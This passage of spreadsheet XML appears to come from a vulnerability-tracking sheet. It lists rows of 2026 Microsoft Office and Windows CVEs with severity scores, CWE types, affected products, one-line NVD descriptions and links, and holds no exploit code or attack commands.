      <c r="N169" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O169" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P169" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q169" s="5" t="inlineStr"/>
      <c r="R169" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S169" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69678</t>
        </is>
      </c>
    </row>
    <row r="170">
      <c r="A170" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B170" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69686</t>
        </is>
      </c>
      <c r="D170" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E170" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F170" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G170" s="5" t="inlineStr"/>
      <c r="H170" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I170" s="5" t="inlineStr"/>
      <c r="J170" s="5" t="inlineStr"/>
      <c r="K170" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L170" s="5" t="inlineStr"/>
      <c r="M170" s="5" t="inlineStr"/>
      <c r="N170" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O170" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P170" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q170" s="5" t="inlineStr"/>
      <c r="R170" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S170" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69686</t>
        </is>
      </c>
    </row>
    <row r="171">
      <c r="A171" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B171" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69712</t>
        </is>
      </c>
      <c r="D171" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E171" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F171" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G171" s="5" t="inlineStr"/>
      <c r="H171" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I171" s="5" t="inlineStr"/>
      <c r="J171" s="5" t="inlineStr"/>
      <c r="K171" s="5" t="inlineStr"/>
      <c r="L171" s="5" t="inlineStr"/>
      <c r="M171" s="5" t="inlineStr"/>
      <c r="N171" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O171" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P171" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q171" s="5" t="inlineStr"/>
      <c r="R171" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S171" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Key Distribution Center allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69712</t>
        </is>
      </c>
    </row>
    <row r="172">
      <c r="A172" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B172" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69716</t>
        </is>
      </c>
      <c r="D172" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E172" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F172" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G172" s="5" t="inlineStr"/>
      <c r="H172" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I172" s="5" t="inlineStr"/>
      <c r="J172" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K172" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L172" s="5" t="inlineStr"/>
      <c r="M172" s="5" t="inlineStr"/>
      <c r="N172" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O172" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P172" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q172" s="5" t="inlineStr"/>
      <c r="R172" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S172" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in Microsoft Office SharePoint allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T172" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69716</t>
        </is>
      </c>
    </row>
    <row r="173">
      <c r="A173" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B173" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69722</t>
        </is>
      </c>
      <c r="D173" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E173" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F173" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G173" s="5" t="inlineStr"/>
      <c r="H173" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I173" s="5" t="inlineStr"/>
      <c r="J173" s="5" t="inlineStr"/>
      <c r="K173" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L173" s="5" t="inlineStr"/>
      <c r="M173" s="5" t="inlineStr"/>
      <c r="N173" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O173" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P173" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q173" s="5" t="inlineStr"/>
      <c r="R173" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S173" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69722</t>
        </is>
      </c>
    </row>
    <row r="174">
      <c r="A174" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B174" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69724</t>
        </is>
      </c>
      <c r="D174" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E174" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F174" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G174" s="5" t="inlineStr"/>
      <c r="H174" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I174" s="5" t="inlineStr"/>
      <c r="J174" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K174" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L174" s="5" t="inlineStr"/>
      <c r="M174" s="5" t="inlineStr"/>
      <c r="N174" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O174" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P174" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q174" s="5" t="inlineStr"/>
      <c r="R174" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S174" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69724</t>
        </is>
      </c>
    </row>
    <row r="175">
      <c r="A175" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B175" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69729</t>
        </is>
      </c>
      <c r="D175" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E175" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F175" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G175" s="5" t="inlineStr"/>
      <c r="H175" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I175" s="5" t="inlineStr"/>
      <c r="J175" s="5" t="inlineStr"/>
      <c r="K175" s="5" t="inlineStr"/>
      <c r="L175" s="5" t="inlineStr"/>
      <c r="M175" s="5" t="inlineStr"/>
      <c r="N175" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O175" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P175" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q175" s="5" t="inlineStr"/>
      <c r="R175" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S175" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Credential Providers allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69729</t>
        </is>
      </c>
    </row>
    <row r="176">
      <c r="A176" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B176" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69740</t>
        </is>
      </c>
      <c r="D176" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E176" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F176" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G176" s="5" t="inlineStr"/>
      <c r="H176" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I176" s="5" t="inlineStr"/>
      <c r="J176" s="5" t="inlineStr"/>
      <c r="K176" s="5" t="inlineStr"/>
      <c r="L176" s="5" t="inlineStr"/>
      <c r="M176" s="5" t="inlineStr"/>
      <c r="N176" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O176" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P176" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q176" s="5" t="inlineStr"/>
      <c r="R176" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S176" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69740</t>
        </is>
      </c>
    </row>
    <row r="177">
      <c r="A177" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B177" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69742</t>
        </is>
      </c>
      <c r="D177" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E177" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F177" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G177" s="5" t="inlineStr"/>
      <c r="H177" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I177" s="5" t="inlineStr"/>
      <c r="J177" s="5" t="inlineStr"/>
      <c r="K177" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:publisher</t>
        </is>
      </c>
      <c r="L177" s="5" t="inlineStr"/>
      <c r="M177" s="5" t="inlineStr"/>
      <c r="N177" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O177" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P177" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q177" s="5" t="inlineStr"/>
      <c r="R177" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S177" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Microsoft Office Publisher allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T177" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69742</t>
        </is>
      </c>
    </row>
    <row r="178">
      <c r="A178" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B178" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C178" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69759</t>
        </is>
      </c>
      <c r="D178" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E178" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F178" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G178" s="5" t="inlineStr"/>
      <c r="H178" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I178" s="5" t="inlineStr"/>
      <c r="J178" s="5" t="inlineStr"/>
      <c r="K178" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L178" s="5" t="inlineStr"/>
      <c r="M178" s="5" t="inlineStr"/>
      <c r="N178" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O178" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P178" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q178" s="5" t="inlineStr"/>
      <c r="R178" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S178" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T178" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69759</t>
        </is>
      </c>
    </row>
    <row r="179">
      <c r="A179" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B179" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C179" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69764</t>
        </is>
      </c>
      <c r="D179" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E179" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F179" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G179" s="5" t="inlineStr"/>
      <c r="H179" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I179" s="5" t="inlineStr"/>
      <c r="J179" s="5" t="inlineStr"/>
      <c r="K179" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L179" s="5" t="inlineStr"/>
      <c r="M179" s="5" t="inlineStr"/>
      <c r="N179" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O179" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P179" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q179" s="5" t="inlineStr"/>
      <c r="R179" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S179" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T179" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69764</t>
        </is>
      </c>
    </row>
    <row r="180">
      <c r="A180" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B180" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69767</t>
        </is>
      </c>
      <c r="D180" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E180" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F180" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G180" s="5" t="inlineStr"/>
      <c r="H180" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I180" s="5" t="inlineStr"/>
      <c r="J180" s="5" t="inlineStr"/>
      <c r="K180" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t>
        </is>
      </c>
      <c r="L180" s="5" t="inlineStr"/>
      <c r="M180" s="5" t="inlineStr"/>
      <c r="N180" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O180" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P180" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q180" s="5" t="inlineStr"/>
      <c r="R180" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S180" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69767</t>
        </is>
      </c>
    </row>
    <row r="181">
      <c r="A181" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B181" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69772</t>
        </is>
      </c>
      <c r="D181" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E181" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F181" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G181" s="5" t="inlineStr"/>
      <c r="H181" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I181" s="5" t="inlineStr"/>
      <c r="J181" s="5" t="inlineStr"/>
      <c r="K181" s="5" t="inlineStr"/>
      <c r="L181" s="5" t="inlineStr"/>
      <c r="M181" s="5" t="inlineStr"/>
      <c r="N181" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O181" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P181" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q181" s="5" t="inlineStr"/>
      <c r="R181" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S181" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Network File System allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69772</t>
        </is>
      </c>
    </row>
    <row r="182">
      <c r="A182" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B182" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69778</t>
        </is>
      </c>
      <c r="D182" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E182" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F182" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G182" s="5" t="inlineStr"/>
      <c r="H182" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I182" s="5" t="inlineStr"/>
      <c r="J182" s="5" t="inlineStr"/>
      <c r="K182" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:access, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L182" s="5" t="inlineStr"/>
      <c r="M182" s="5" t="inlineStr"/>
      <c r="N182" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O182" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P182" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q182" s="5" t="inlineStr"/>
      <c r="R182" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S182" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Access allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T182" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69778</t>
        </is>
      </c>
    </row>
    <row r="183">
      <c r="A183" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B183" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69784</t>
        </is>
      </c>
      <c r="D183" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E183" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F183" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G183" s="5" t="inlineStr"/>
      <c r="H183" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I183" s="5" t="inlineStr"/>
      <c r="J183" s="5" t="inlineStr"/>
      <c r="K183" s="5" t="inlineStr"/>
      <c r="L183" s="5" t="inlineStr"/>
      <c r="M183" s="5" t="inlineStr"/>
      <c r="N183" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O183" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P183" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q183" s="5" t="inlineStr"/>
      <c r="R183" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S183" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69784</t>
        </is>
      </c>
    </row>
    <row r="184">
      <c r="A184" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B184" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69797</t>
        </is>
      </c>
      <c r="D184" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E184" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F184" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G184" s="5" t="inlineStr"/>
      <c r="H184" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I184" s="5" t="inlineStr"/>
      <c r="J184" s="5" t="inlineStr"/>
      <c r="K184" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t>
        </is>
      </c>
      <c r="L184" s="5" t="inlineStr"/>
      <c r="M184" s="5" t="inlineStr"/>
      <c r="N184" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O184" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P184" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q184" s="5" t="inlineStr"/>
      <c r="R184" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S184" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69797</t>
        </is>
      </c>
    </row>
    <row r="185">
      <c r="A185" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B185" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69860</t>
        </is>
      </c>
      <c r="D185" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E185" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F185" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G185" s="5" t="inlineStr"/>
      <c r="H185" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I185" s="5" t="inlineStr"/>
      <c r="J185" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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85" s="5" t="inlineStr"/>
      <c r="M185" s="5" t="inlineStr"/>
      <c r="N185" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O185" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P185" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q185" s="5" t="inlineStr"/>
      <c r="R185" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S185" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69860</t>
        </is>
      </c>
    </row>
    <row r="186">
      <c r="A186" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B186" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70203</t>
        </is>
      </c>
      <c r="D186" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E186" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F186" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G186" s="5" t="inlineStr"/>
